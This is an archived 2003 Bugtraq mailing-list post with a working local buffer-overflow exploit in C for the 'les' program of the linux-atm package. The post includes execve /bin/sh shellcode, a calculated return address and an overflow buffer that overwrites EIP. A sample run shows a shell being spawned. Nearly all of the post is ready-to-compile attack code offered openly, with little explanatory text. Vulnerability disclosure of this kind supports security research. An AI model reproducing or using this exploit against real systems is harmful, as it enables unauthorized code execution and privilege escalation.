lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030525051932.19660.qmail@www.securityfocus.com>
Date: 25 May 2003 05:19:32 -0000
From: axis ph4nt0m <axis@...nt0m.net>
To: bugtraq@...urityfocus.com
Subject: ATM on linux Exploit(les,local)




/*  ATM on linux Exploit
*** vulnerability discovered by Angelo Rosiello
*** sorry for my poor english.
*** i wrote this exploit just for fun.
*** i can't get a rootshell on my linux :(
*** tested on redhat7.3 ,other linux maybe OK,too.
*** atm package:linux-atm-2.4.0-1.i386.rpm
*** http://sourceforge.net/projects/linux-atm
***
*** Here is another exploit by Angelo Rosiello
*** But i can't get shell with this code
*** http://www.securiteam.com/exploits/5EP0M1P9PO.html
***************************************************

   Buffer is 244 bytes
   using 244+4 bytes to overwrite eip.

***************************************************
*** AUTOR:@Xis2(ph4nt0m)
*** CONTACT:axis@...nt0m.net
*** COPYRIGHT (c) 2003 PH4NT0M SECURITY
*** http://www.ph4nt0m.net
*** 2003.5.15
***************************************************

[tt@...NT0M explab]$ gcc -o linux_atm myatm.c
[tt@...NT0M explab]$ ./linux_atm
****************************************

linux-atm exploit!

Coded by @Xis2(ph4nt0m)
Welcome to http://www.ph4nt0m.net

Jump to 0xbffffa5c
****************************************


DEBUG: Log opened
NOTE: Configuration file: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA?&#63733;?
sh-2.05a$

***************************************************

*/


#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

#define  BSIZE               244

/*  linux x86 shellcode by bob from dtors.net,23 bytes  */
char shellcode[]="\x31\xc0\x50\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x50"
"\x53\x89\xe1\xb0\x0b\xcd\x80";


int main(int argc,char *argv[]){
    char buf[BSIZE+10];
    char  *prog[]={"/usr/local/sbin/les","-f",buf,NULL};
    char  *env[]={"HOME=/root",shellcode,NULL};
    unsigned long ret;

    printf("****************************************\n\n");
    printf("Linux-atm exploit!\n\n");
    printf("Coded by @Xis2(ph4nt0m)\n");
    printf("Welcome to http://www.ph4nt0m.net\n\n");
    printf("Jump to 0x%08x\n",&ret);
    printf("****************************************\n\n\n");


/* calculate the shellcode address  */
    ret=0xc0000000-sizeof(void *)-strlen(prog[0])-strlen(shellcode)-0x02;

/* construct our evil buffer  */
    memset(buf,0x41,sizeof(buf));
    memcpy(buf+BSIZE+4,(char *)&ret,4);
    buf[BSIZE+8]=0x00;

    execve(prog[0],prog,env);

    return  0;
}



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ